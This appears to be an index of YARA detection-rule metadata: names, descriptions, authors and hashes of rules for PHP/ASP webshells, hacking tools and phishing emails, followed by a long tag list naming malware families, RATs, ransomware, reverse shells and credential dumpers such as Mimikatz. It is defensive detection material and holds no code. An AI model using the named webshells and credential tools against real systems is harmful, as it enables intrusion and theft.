webshells_index multiple_webshells_0005 description: Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php hash0: 0714f80f35c1fddef1f8938b8d42a4c8 hash1: 911195a9b7c010f61b66439d9048f400 hash2: eddf7a8fde1e50a7f2a817ef7cece24f hash3: 8023394542cddf8aee5dec6072ed02b5 hash4: eed14de3907c9aa2550d95550d1a2d5f hash5: 817671e1bdc85e04cc3440bbd9288800
webshells_index multiple_webshells_0010 description: Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _w_php_php_wacking_php_php_SpecialShell_99_php_php hash0: 38a3f9f2aa47c2e940695f3dba6a7bb2 hash1: 9c5bb5e3a46ec28039e8986324e42792 hash2: 09609851caa129e40b0d56e90dfc476c
webshells_index multiple_webshells_0015 description: Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _wacking_php_php_1_SpecialShell_99_php_php_c100_php hash0: 9c5bb5e3a46ec28039e8986324e42792 hash1: 44542e5c3e9790815c49d5f9beffbbf2 hash2: 09609851caa129e40b0d56e90dfc476c hash3: 38fd7e45f9c11a37463c3ded1c76af4c
webshells_index multiple_webshells_0016 description: Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _r577_php_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php hash0: 0714f80f35c1fddef1f8938b8d42a4c8 hash1: eddf7a8fde1e50a7f2a817ef7cece24f hash2: 8023394542cddf8aee5dec6072ed02b5 hash3: eed14de3907c9aa2550d95550d1a2d5f hash4: 817671e1bdc85e04cc3440bbd9288800
webshells_index multiple_php_webshells description: Semi-Auto-generated - from files multiple_php_webshells author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 hash0: 0714f80f35c1fddef1f8938b8d42a4c8 hash1: 911195a9b7c010f61b66439d9048f400 hash2: be0f67f3e995517d18859ed57b4b4389 hash3: eddf7a8fde1e50a7f2a817ef7cece24f hash4: 8023394542cddf8aee5dec6072ed02b5 hash5: eed14de3907c9aa2550d95550d1a2d5f hash6: 817671e1bdc85e04cc3440bbd9288800 hash7: 7101fe72421402029e2629f3aaed6de7 hash8: f618f41f7ebeb5e5076986a66593afd1
webshells_index multiple_webshells_0019 description: Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _w_php_php_c99madshell_v2_1_php_php_wacking_php_php hash0: 38a3f9f2aa47c2e940695f3dba6a7bb2 hash1: 3ca5886cd54d495dc95793579611f59a hash2: 9c5bb5e3a46ec28039e8986324e42792
webshells_index multiple_webshells_0022 description: Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_SpecialShell_99_php_php hash0: 38a3f9f2aa47c2e940695f3dba6a7bb2 hash1: 3ca5886cd54d495dc95793579611f59a hash2: 9c5bb5e3a46ec28039e8986324e42792 hash3: d8ae5819a0a2349ec552cbcf3a62c975 hash4: 09609851caa129e40b0d56e90dfc476c
webshells_index multiple_webshells_0030 description: Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_1_SpecialShell_99_php_php hash0: 38a3f9f2aa47c2e940695f3dba6a7bb2 hash1: 3ca5886cd54d495dc95793579611f59a hash2: 9c5bb5e3a46ec28039e8986324e42792 hash3: 44542e5c3e9790815c49d5f9beffbbf2 hash4: 09609851caa129e40b0d56e90dfc476c
webshells_index multiple_webshells_0031 description: Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls super_rule: 1 was: _r577_php_php_r57_php_php_spy_php_php_s_php_php hash0: 0714f80f35c1fddef1f8938b8d42a4c8 hash1: eddf7a8fde1e50a7f2a817ef7cece24f hash2: eed14de3907c9aa2550d95550d1a2d5f hash3: 817671e1bdc85e04cc3440bbd9288800
webshells_index PHP_Cloaked_Webshell_SuperFetchExec description: Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC reference: http://goo.gl/xFvioC author: Florian Roth score: 50
webshells_index WebShell_simattacker description: PHP Webshells Github Archive - file simattacker.php author: Florian Roth hash: 258297b62aeaf4650ce04642ad5f19be25ec29c9
webshells_index WebShell_b374k_mini_shell_php_php description: PHP Webshells Github Archive - file b374k-mini-shell-php.php.php author: Florian Roth hash: afb88635fbdd9ebe86b650cc220d3012a8c35143
webshells_index WebShell_b374k_php description: PHP Webshells Github Archive - file b374k.php.php author: Florian Roth hash: 04c99efd187cf29dc4e5603c51be44170987bce2
webshells_index WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend description: PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php author: Florian Roth hash: 6454cc5ab73143d72cf0025a81bd1fe710351b44
webshells_index WebShell_h4ntu_shell__powered_by_tsoi_ description: PHP Webshells Github Archive - file h4ntu shell [powered by tsoi].php author: Florian Roth hash: cbca8cd000e705357e2a7e0cf8262678706f18f9
webshells_index WebShell_php_webshells_MyShell description: PHP Webshells Github Archive - file MyShell.php author: Florian Roth hash: 42e283c594c4d061f80a18f5ade0717d3fb2f76d
webshells_index WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit description: PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php author: Florian Roth hash: b2b797707e09c12ff5e632af84b394ad41a46fa4
webshells_index WebShell_php_backdoor description: PHP Webshells Github Archive - file php-backdoor.php author: Florian Roth hash: b190c03af4f3fb52adc20eb0f5d4d151020c74fe
webshells_index WebShell_php_webshells_pHpINJ description: PHP Webshells Github Archive - file pHpINJ.php author: Florian Roth hash: 75116bee1ab122861b155cc1ce45a112c28b9596
webshells_index WebShell_php_webshells_NGH description: PHP Webshells Github Archive - file NGH.php author: Florian Roth hash: c05b5deecfc6de972aa4652cb66da89cfb3e1645
webshells_index WebShell_php_webshells_matamu description: PHP Webshells Github Archive - file matamu.php author: Florian Roth hash: d477aae6bd2f288b578dbf05c1c46b3aaa474733
webshells_index WebShell_ru24_post_sh description: PHP Webshells Github Archive - file ru24_post_sh.php author: Florian Roth hash: d2c18766a1cd4dda928c12ff7b519578ccec0769
webshells_index WebShell_hiddens_shell_v1 description: PHP Webshells Github Archive - file hiddens shell v1.php author: Florian Roth hash: 1674bd40eb98b48427c547bf9143aa7fbe2f4a59
webshells_index WebShell_safe0ver description: PHP Webshells Github Archive - file safe0ver.php author: Florian Roth hash: 366639526d92bd38ff7218b8539ac0f154190eb8
webshells_index WebShell_lamashell description: PHP Webshells Github Archive - file lamashell.php author: Florian Roth hash: b71181e0d899b2b07bc55aebb27da6706ea1b560
webshells_index WebShell_Simple_PHP_backdoor_by_DK description: PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php author: Florian Roth hash: 03f6215548ed370bec0332199be7c4f68105274e
webshells_index WebShell_AK_74_Security_Team_Web_Shell_Beta_Version description: PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php author: Florian Roth hash: c90b0ba575f432ecc08f8f292f3013b5532fe2c4
webshells_index WebShell_qsd_php_backdoor description: PHP Webshells Github Archive - file qsd-php-backdoor.php author: Florian Roth hash: 4856bce45fc5b3f938d8125f7cdd35a8bbae380f
webshells_index WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz description: PHP Webshells Github Archive - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.php author: Florian Roth hash: 5fe8c1d01dc5bc70372a8a04410faf8fcde3cb68
webshells_index WebShell_WinX_Shell description: PHP Webshells Github Archive - file WinX Shell.php author: Florian Roth hash: a94d65c168344ad9fa406d219bdf60150c02010e
webshells_index WebShell_php_include_w_shell description: PHP Webshells Github Archive - file php-include-w-shell.php author: Florian Roth hash: 1a7f4868691410830ad954360950e37c582b0292
webshells_index WebShell_PhpSpy_Ver_2006 description: PHP Webshells Github Archive - file PhpSpy Ver 2006.php author: Florian Roth hash: 34a89e0ab896c3518d9a474b71ee636ca595625d
webshells_index WebShell_go_shell description: PHP Webshells Github Archive - file go-shell.php author: Florian Roth hash: 3dd85981bec33de42c04c53d081c230b5fc0e94f
webshells_index WebShell_zehir4_asp_php description: PHP Webshells Github Archive - file zehir4.asp.php.txt author: Florian Roth hash: 1d9b78b5b14b821139541cc0deb4cbbd994ce157
webshells_index WebShell_CasuS_1_5 description: PHP Webshells Github Archive - file CasuS 1.5.php author: Florian Roth hash: 7eee8882ad9b940407acc0146db018c302696341
webshells_index WebShell__findsock_php_findsock_shell_php_reverse_shell description: PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php author: Florian Roth super_rule: 1 hash0: 5622c9841d76617bfc3cd4cab1932d8349b7044f hash1: 4a20f36035bbae8e342aab0418134e750b881d05 hash2: 40dbdc0bdf5218af50741ba011c5286a723fa9bf
webshells_index Unpack_Injectt description: Webshells Auto-generated - file Injectt.exe author: Yara Bulk Rule Generator by Florian Roth hash: 8a5d2158a566c87edc999771e12d42c5
webshells_index FeliksPack3___PHP_Shells_ssh description: Webshells Auto-generated - file ssh.php author: Yara Bulk Rule Generator by Florian Roth hash: 1aa5307790d72941589079989b4f900e
webshells_index bin_Client description: Webshells Auto-generated - file Client.exe author: Yara Bulk Rule Generator by Florian Roth hash: 5f91a5b46d155cacf0cc6673a2a5461b
webshells_index ZXshell2_0_rar_Folder_ZXshell description: Webshells Auto-generated - file ZXshell.exe author: Yara Bulk Rule Generator by Florian Roth hash: 246ce44502d2f6002d720d350e26c288
webshells_index RkNTLoad description: Webshells Auto-generated - file RkNTLoad.exe author: Yara Bulk Rule Generator by Florian Roth hash: 262317c95ced56224f136ba532b8b34f
webshells_index binder2_binder2 description: Webshells Auto-generated - file binder2.exe author: Yara Bulk Rule Generator by Florian Roth hash: d594e90ad23ae0bc0b65b59189c12f11
webshells_index thelast_orice2 description: Webshells Auto-generated - file orice2.php author: Yara Bulk Rule Generator by Florian Roth hash: aa63ffb27bde8d03d00dda04421237ae
webshells_index sendmail description: Webshells Auto-generated - file sendmail.exe author: Yara Bulk Rule Generator by Florian Roth hash: 75b86f4a21d8adefaf34b3a94629bd17
webshells_index FSO_s_zehir4 description: Webshells Auto-generated - file zehir4.asp author: Yara Bulk Rule Generator by Florian Roth hash: 5b496a61363d304532bcf52ee21f5d55
webshells_index hkshell_hkshell description: Webshells Auto-generated - file hkshell.exe author: Yara Bulk Rule Generator by Florian Roth hash: 168cab58cee59dc4706b3be988312580
webshells_index DarkSpy105 description: Webshells Auto-generated - file DarkSpy105.exe author: Yara Bulk Rule Generator by Florian Roth hash: f0b85e7bec90dba829a3ede1ab7d8722
webshells_index EditServer_Webshell description: Webshells Auto-generated - file EditServer.exe author: Yara Bulk Rule Generator by Florian Roth hash: f945de25e0eba3bdaf1455b3a62b9832
webshells_index FSO_s_reader description: Webshells Auto-generated - file reader.asp author: Yara Bulk Rule Generator by Florian Roth hash: b598c8b662f2a1f6cc61f291fb0a6fa2
webshells_index svchostdll description: Webshells Auto-generated - file svchostdll.dll author: Yara Bulk Rule Generator by Florian Roth hash: 0f6756c8cb0b454c452055f189e4c3f4
webshells_index HYTop_DevPack_server description: Webshells Auto-generated - file server.asp author: Yara Bulk Rule Generator by Florian Roth hash: 1d38526a215df13c7373da4635541b43
webshells_index vanquish description: Webshells Auto-generated - file vanquish.dll author: Yara Bulk Rule Generator by Florian Roth hash: 684450adde37a93e8bb362994efc898c
webshells_index BIN_Client description: Webshells Auto-generated - file Client.exe author: Yara Bulk Rule Generator by Florian Roth hash: 9f0a74ec81bc2f26f16c5c172b80eca7
webshells_index Simple_PHP_BackDooR description: Webshells Auto-generated - file Simple_PHP_BackDooR.php author: Yara Bulk Rule Generator by Florian Roth hash: a401132363eecc3a1040774bec9cb24f
webshells_index hkshell_hkrmv description: Webshells Auto-generated - file hkrmv.exe author: Yara Bulk Rule Generator by Florian Roth hash: bd3a0b7a6b5536f8d96f50956560e9bf
webshells_index FeliksPack3___PHP_Shells_phpft description: Webshells Auto-generated - file phpft.php author: Yara Bulk Rule Generator by Florian Roth hash: 60ef80175fcc6a879ca57c54226646b1
webshells_index bdcli100 description: Webshells Auto-generated - file bdcli100.exe author: Yara Bulk Rule Generator by Florian Roth hash: b12163ac53789fb4f62e4f17a8c2e028
webshells_index rdrbs084 description: Webshells Auto-generated - file rdrbs084.exe author: Yara Bulk Rule Generator by Florian Roth hash: ed30327b255816bdd7590bf891aa0020
webshells_index HYTop_CaseSwitch_2005 description: Webshells Auto-generated - file 2005.exe author: Yara Bulk Rule Generator by Florian Roth hash: 8bf667ee9e21366bc0bd3491cb614f41
webshells_index FSO_s_casus15_2 description: Webshells Auto-generated - file casus15.php author: Yara Bulk Rule Generator by Florian Roth hash: 8d155b4239d922367af5d0a1b89533a3
webshells_index installer description: Webshells Auto-generated - file installer.cmd author: Yara Bulk Rule Generator by Florian Roth hash: a507919ae701cf7e42fa441d3ad95f8f
webshells_index elmaliseker description: Webshells Auto-generated - file elmaliseker.asp author: Yara Bulk Rule Generator by Florian Roth hash: ccf48af0c8c09bbd038e610a49c9862e
webshells_index shelltools_g0t_root_resolve description: Webshells Auto-generated - file resolve.exe author: Yara Bulk Rule Generator by Florian Roth hash: 69bf9aa296238610a0e05f99b5540297
webshells_index shelltools_g0t_root_Fport description: Webshells Auto-generated - file Fport.exe author: Yara Bulk Rule Generator by Florian Roth hash: dbb75488aa2fa22ba6950aead1ef30d5
webshells_index HYTop_DevPack_upload description: Webshells Auto-generated - file upload.asp author: Yara Bulk Rule Generator by Florian Roth hash: b09852bda534627949f0259828c967de
webshells_index PasswordReminder description: Webshells Auto-generated - file PasswordReminder.exe author: Yara Bulk Rule Generator by Florian Roth hash: ea49d754dc609e8bfa4c0f95d14ef9bf
webshells_index rknt_zip_Folder_RkNT description: Webshells Auto-generated - file RkNT.dll author: Yara Bulk Rule Generator by Florian Roth hash: 5f97386dfde148942b7584aeb6512b85
webshells_index dbgntboot description: Webshells Auto-generated - file dbgntboot.dll author: Yara Bulk Rule Generator by Florian Roth hash: 4d87543d4d7f73c1529c9f8066b475ab
webshells_index PHP_shell description: Webshells Auto-generated - file shell.php author: Yara Bulk Rule Generator by Florian Roth hash: 45e8a00567f8a34ab1cccc86b4bc74b9
webshells_index rdrbs100 description: Webshells Auto-generated - file rdrbs100.exe author: Yara Bulk Rule Generator by Florian Roth hash: 7c752bcd6da796d80a6830c61a632bff
webshells_index Mithril_Mithril description: Webshells Auto-generated - file Mithril.exe author: Yara Bulk Rule Generator by Florian Roth hash: 017191562d72ab0ca551eb89256650bd
webshells_index hkdoordll description: Webshells Auto-generated - file hkdoordll.dll author: Yara Bulk Rule Generator by Florian Roth hash: b715c009d47686c0e62d0981efce2552
webshells_index Mithril_v1_45_dllTest description: Webshells Auto-generated - file dllTest.dll author: Yara Bulk Rule Generator by Florian Roth hash: 1b9e518aaa62b15079ff6edb412b21e9
webshells_index dbgiis6cli description: Webshells Auto-generated - file dbgiis6cli.exe author: Yara Bulk Rule Generator by Florian Roth hash: 3044dceb632b636563f66fee3aaaf8f3
webshells_index Debug_cress description: Webshells Auto-generated - file cress.exe author: Yara Bulk Rule Generator by Florian Roth hash: 36a416186fe010574c9be68002a7286a
webshells_index FeliksPack3___PHP_Shells_usr description: Webshells Auto-generated - file usr.php author: Yara Bulk Rule Generator by Florian Roth hash: ade3357520325af50c9098dc8a21a024
webshells_index FSO_s_phpinj description: Webshells Auto-generated - file phpinj.php author: Yara Bulk Rule Generator by Florian Roth hash: dd39d17e9baca0363cc1c3664e608929
webshells_index xssshell_db description: Webshells Auto-generated - file db.asp author: Yara Bulk Rule Generator by Florian Roth hash: cb62e2ec40addd4b9930a9e270f5b318
webshells_index EditServer_Webshell_2 description: Webshells Auto-generated - file EditServer.exe author: Yara Bulk Rule Generator by Florian Roth hash: 5c1f25a4d206c83cdfb006b3eb4c09ba
webshells_index by064cli description: Webshells Auto-generated - file by064cli.exe author: Yara Bulk Rule Generator by Florian Roth hash: 10e0dff366968b770ae929505d2a9885
webshells_index Mithril_dllTest description: Webshells Auto-generated - file dllTest.dll author: Yara Bulk Rule Generator by Florian Roth hash: a8d25d794d8f08cd4de0c3d6bf389e6d
webshells_index connector description: Webshells Auto-generated - file connector.asp author: Yara Bulk Rule Generator by Florian Roth hash: 3ba1827fca7be37c8296cd60be9dc884
webshells_index shelltools_g0t_root_HideRun description: Webshells Auto-generated - file HideRun.exe author: Yara Bulk Rule Generator by Florian Roth hash: 45436d9bfd8ff94b71eeaeb280025afe
webshells_index regshell description: Webshells Auto-generated - file regshell.exe author: Yara Bulk Rule Generator by Florian Roth hash: db2fdc821ca6091bab3ebd0d8bc46ded
webshells_index PHP_Shell_v1_7 description: Webshells Auto-generated - file PHP_Shell_v1.7.php author: Yara Bulk Rule Generator by Florian Roth hash: b5978501c7112584532b4ca6fb77cba5
webshells_index xssshell_save description: Webshells Auto-generated - file save.asp author: Yara Bulk Rule Generator by Florian Roth hash: 865da1b3974e940936fe38e8e1964980
webshells_index screencap description: Webshells Auto-generated - file screencap.exe author: Yara Bulk Rule Generator by Florian Roth hash: 51139091dea7a9418a50f2712ea72aa6
webshells_index ZXshell2_0_rar_Folder_zxrecv description: Webshells Auto-generated - file zxrecv.exe author: Yara Bulk Rule Generator by Florian Roth hash: 5d3d12a39f41d51341ef4cb7ce69d30f
webshells_index _root_040_zip_Folder_deploy description: Webshells Auto-generated - file deploy.exe author: Yara Bulk Rule Generator by Florian Roth hash: 2c9f9c58999256c73a5ebdb10a9be269
webshells_index by063cli description: Webshells Auto-generated - file by063cli.exe author: Yara Bulk Rule Generator by Florian Roth hash: 49ce26eb97fd13b6d92a5e5d169db859
webshells_index icyfox007v1_10_rar_Folder_asp description: Webshells Auto-generated - file asp.asp author: Yara Bulk Rule Generator by Florian Roth hash: 2c412400b146b7b98d6e7755f7159bb9
webshells_index byshell063_ntboot_2 description: Webshells Auto-generated - file ntboot.dll author: Yara Bulk Rule Generator by Florian Roth hash: cb9eb5a6ff327f4d6c46aacbbe9dda9d
webshells_index shelltools_g0t_root_xwhois description: Webshells Auto-generated - file xwhois.exe author: Yara Bulk Rule Generator by Florian Roth hash: 0bc98bd576c80d921a3460f8be8816b4
webshells_index vanquish_2 description: Webshells Auto-generated - file vanquish.exe author: Yara Bulk Rule Generator by Florian Roth hash: 2dcb9055785a2ee01567f52b5a62b071
webshells_index ZXshell2_0_rar_Folder_nc description: Webshells Auto-generated - file nc.exe author: Yara Bulk Rule Generator by Florian Roth hash: 2cd1bf15ae84c5f6917ddb128827ae8b
webshells_index BIN_Server description: Webshells Auto-generated - file Server.exe author: Yara Bulk Rule Generator by Florian Roth hash: 1d5aa9cbf1429bb5b8bf600335916dcd
webshells_index HYTop2006_rar_Folder_2006 description: Webshells Auto-generated - file 2006.asp author: Yara Bulk Rule Generator by Florian Roth hash: c19d6f4e069188f19b08fa94d44bc283
webshells_index HDConfig description: Webshells Auto-generated - file HDConfig.exe author: Yara Bulk Rule Generator by Florian Roth hash: 7d60e552fdca57642fd30462416347bd
webshells_index Pastebin_Webshell description: Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs author: Florian Roth score: 70 date: 13.01.2015 reference: http://goo.gl/7dbyZs
webshells_index chinese_spam_echoer author: Vlad https://github.com/vlad-s date: 2016/07/18 description: Catches chinese PHP spam files (printers)
email_index CryptoWall_Resume_phish Author: http://phishme.com/ reference: https://github.com/phishme/malware_analysis/blob/master/yara_rules/cryptowall.yar
email_index with_attachment author: Antonio Sanchez <asanchez@hispasec.com> reference: http://laboratorio.blogs.hispasec.com/ description: Rule to detect the presence of an or several attachments
email_index davivienda
email_index email_Ukraine_power_attack_content author: @mmorenog,@yararules description: Detects a possible .eml used in the Ukraine BE power attack ref1: https://twitter.com/lowcalspam/status/692625258394726400
email_index content author: A.Sanchez <asanchez@koodous.com> description: Detects scam emails with phishing attachment. test1: email/eml/transferencia1.eml test2: email/eml/transferencia2.eml

YARA:TAGS

tags
SafeNetStrings SafeNet ScarhiknStrings ScarhiknCode Scarhikn sendsafe CrowdStrike_Shamoon_DroppedFile EldoS_RawDisk Shifu skeleton_key_patcher skeleton_key_injected_code Spora unk_packer with_sqlite universal_1337_stealer_serveur RSharedStrings GmRemoteStrings GmRemote SurtrStrings SurtrCode Surtr T5000Strings T5000 Tedroo Tinba2 ELF_Linux_Torte_domains TreasureHunt urausy_skype_dat VidgrabStrings Vidgrab Wabot WarpCode WarpStrings Warp WimmieShellcode WimmieStrings Wimmie XMRIG_Miner XOR_DDosv1 YayihCode YayihStrings Yayih Zegost Windows_Malware_Zeus viotto_keylogger xDedic_SysScan_unpacked DeltaCharlie IndiaAlfa_One IndiaBravo_PapaAlfa IndiaBravo_RomeoCharlie IndiaBravo_RomeoBravo IndiaBravo_generic IndiaCharlie_One IndiaCharlie_Two LimaCharlie PapaAlfa RomeoCharlie RomeoEcho RomeoFoxtrot SierraBravo_packed SierraCharlie RomeoJuliettMikeTwo TangoAlfa WhiskeyAlfa WhiskeyDelta Lightweight_Backdoor1 LightweightBackdoor2 LightweightBackdoor3 LightweightBackdoor4 LightweightBackdoor5 LightweightBackdoor6 ProxyTool1 ProxyTool2 ProxyTool3 DestructiveTargetCleaningTool5 DestructiveTargetCleaningTool6 DestructiveTargetCleaningTool7 Malwareusedbycyberthreatactor1 Malwareusedbycyberthreatactor2 Malwareusedbycyberthreatactor3 wiper_unique_strings wiper_encoded_strings createP2P dump_tool misc_pos unknown regex_pos regexpr_pos reg_pos sets_pos monitor_tool_pos keyfinder_tool memdump_diablo blazingtools sysocmgr lacy_keylogger searchinject heistenberg_pos pos_jack pos_memory_scrapper_ pos_uploader pos_chewbacca BernhardPOS easterjackpos LogPOS Mozart Ransom_CryptXXX_Dropper Ransom_CryptXXX_Real legion_777 Ransom_Alpha Ransom_Alfa cerber3 cerber4 cerber5 Ransom CryptoLocker_set1 CryptoLocker_rule2 BackdoorFCKG DMALocker DMALocker4 Locky_Ransomware Locky_Ransomware_2 Ransom_Petya Ransom_Satana Ransom_Satana_Dropper TeslaCrypt Win32Toxic Adzok BlackShades2 BlackShades_4 BlackShades BlackShades_25052015 Bolonyokte Bozok Cerberus Crimson CyberGate DarkComet_2 DarkComet_3 
DarkComet_4 CSIT_14003_03 gh0st gholeeV1 MW_gholee_v1 glassrat Win32OPCHavex Win32FertgerHavex Havex_Trojan_PHP_Server Indetectables_RAT Meterpreter_Reverse_Tcp NetWiredRC_B Njrat njrat1 win_exe_njRAT network_traffic_njRAT PlugXStrings plugX PoisonIvy_2 AAR Ap0calypse Arcom BlackNix BlueBanana ClientMesh DarkRAT Greame HawkEye Imminent Infinity JavaDropper LostDoor LuminosityLink LuxNet NanoCore Paradox Plasma PredatorPain Punisher PythoRAT QRat SmallNet SpyGate Sub7Nation UPX Vertex unrecom ShadowTech shimrat shimratreporter TerminatorRat TROJAN_Notepad_shell_crew xtreme_rat XtremeRATCode XtremeRATStrings XtremeRAT xtremrat zoxPNG_RAT xRAT xRAT20 HTTPSCANNER dubrute Powerkatz_DLL_Generic WindowsCredentialEditor Amplia_Security_Tool PScan_Portscan_1 HackTool_Samples Fierce2 Ncrack SQLMap PortScanner NetBIOS_Name_Scanner FeliksPack3___Scanners_ipscan CGISscan_CGIScan IP_Stealing_Utilities PortRacer scanarator _Bitchin_Threads_ portscan ProPort_zip_Folder_ProPort StealthWasp_s_Basic_PortScanner_v1_2 BluesPortScan scanarator_iis Angry_IP_Scanner_v2_08_ipscan crack_Loader WCE_Modified_1_1014 BypassUac_3 APT_Proxy_Malware_Packed_dev Hacktools_CN_Panda_Burst Hacktools_CN_Burst_Blast Jc_WinEggDrop_Shell LinuxHacktool_eyes_pscan2 CN_Portscan Mimikatz_Memory_Rule_1 Mimikatz_Memory_Rule_2 VSSown_VBS Payload_Exe2Hex Contains_hidden_PE_File_inside_a_sequence_of_numbers possible_exploit XDP_embedded_PDF powershell Contains_UserForm_Object malrtf_ole2link maldoc_API_hashing maldoc_indirect_function_call_1 maldoc_indirect_function_call_2 maldoc_indirect_function_call_3 maldoc_find_kernel32_base_method_1 maldoc_getEIP_method_1 macrocheck Backdoor_WebShell_asp webshell_iMHaPFtp_2 webshell_caidao_shell_guo webshell_cihshell_fix webshell_asp_EFSO_2 webshell_caidao_shell_ice_2 webshell_asp_ice webshell_asp_404 webshell_webshell_cnseay02_1 webshell_php_fbi webshell_B374kPHP_B374k webshell_caidao_shell_404 webshell_ASP_aspydrv webshell_Dx_Dx webshell_MySQL_Web_Interface_Version_0_8 
webshell_wsb_idc webshell_webshell_cnseay_x webshell_phpkit_0_1a_odd webshell_Java_Shell webshell_simple_backdoor webshell_PHP_c37 webshell_PHP_b37 webshell_ghost_source_icesword_silic webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx webshell_itsec_PHPJackal_itsecteam_shell_jHn webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY webshell_webshells_new_con2 webshell_Expdoor_com_ASP webshell_webshells_new_php2 webshell_bypass_iisuser_p webshell_sig_404super webshell_webshells_new_JSP webshell_dev_core webshell_webshells_new_pHp webshell_webshells_new_pppp webshell_webshells_new_code webshell_webshells_new_xxxx webshell_webshells_new_PHP1 webshell_webshells_new_php6 webshell_GetPostpHp webshell_webshells_new_php5 perlbot_pl php_backdoor_php Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php shankar_php_php Casus15_php_php small_php_php shellbot_pl fuckphpshell_php ngh_php_php jsp_reverse_jsp Tool_asp NT_Addy_asp SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php phvayvv_php_php r57shell_php_php rst_sql_php_php wh_bindshell_py lurm_safemod_on_cgi c99madshell_v2_0_php_php w3d_php_php WinX_Shell_html Dx_php_php csh_php_php pHpINJ_php_php sig_2008_php_php ak74shell_php_php Rem_View_php_php STNC_php_php aZRaiLPhp_v1_0_php zacosmall_php CmdAsp_asp simple_backdoor_php mysql_shell_php Dive_Shell_1_0___Emperor_Hacking_Team_php Asmodeus_v0_1_pl Reader_asp phpshell17_php SimShell_1_0___Simorgh_Security_MGZ_php jspshall_jsp rootshell_php connectback2_pl shells_PHP_wso backdoor1_php elmaliseker_asp s72_Shell_v1_1_Coding_html hidshell_php_php kacak_asp PHP_Backdoor_Connect_pl_php Antichat_Socks5_Server_php_php Antichat_Shell_v1_3_php Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php cyberlords_sql_php_php Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html EFSO_2_asp lamashell_php Ajax_PHP_Command_Shell_php JspWebshell_1_2_jsp Sincap_php_php sh_php_php phpjackal_php sql_php_php cgi_python_py telnetd_pl php_include_w_shell_php 
Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php shell_php_php telnet_cgi ironshell_php backdoorfr_php aspydrv_asp cmdjsp_jsp h4ntu_shell__powered_by_tsoi_ Ajan_asp PHANTASMA_php MySQL_Web_Interface_Version_0_8_php multiple_webshells_0002 multiple_webshells_0003 multiple_webshells_0005 multiple_webshells_0010 multiple_webshells_0015 multiple_webshells_0016 multiple_php_webshells multiple_webshells_0019 multiple_webshells_0022 multiple_webshells_0030 multiple_webshells_0031 PHP_Cloaked_Webshell_SuperFetchExec WebShell_simattacker WebShell_b374k_mini_shell_php_php WebShell_b374k_php WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend WebShell_h4ntu_shell__powered_by_tsoi_ WebShell_php_webshells_MyShell WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit WebShell_php_backdoor WebShell_php_webshells_pHpINJ WebShell_php_webshells_NGH WebShell_php_webshells_matamu WebShell_ru24_post_sh WebShell_hiddens_shell_v1 WebShell_safe0ver WebShell_lamashell WebShell_Simple_PHP_backdoor_by_DK WebShell_AK_74_Security_Team_Web_Shell_Beta_Version WebShell_qsd_php_backdoor WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz WebShell_WinX_Shell WebShell_php_include_w_shell WebShell_PhpSpy_Ver_2006 WebShell_go_shell WebShell_zehir4_asp_php WebShell_CasuS_1_5 WebShell__findsock_php_findsock_shell_php_reverse_shell Unpack_Injectt FeliksPack3___PHP_Shells_ssh bin_Client ZXshell2_0_rar_Folder_ZXshell RkNTLoad binder2_binder2 thelast_orice2 sendmail FSO_s_zehir4 hkshell_hkshell DarkSpy105 EditServer_Webshell FSO_s_reader svchostdll HYTop_DevPack_server vanquish BIN_Client Simple_PHP_BackDooR 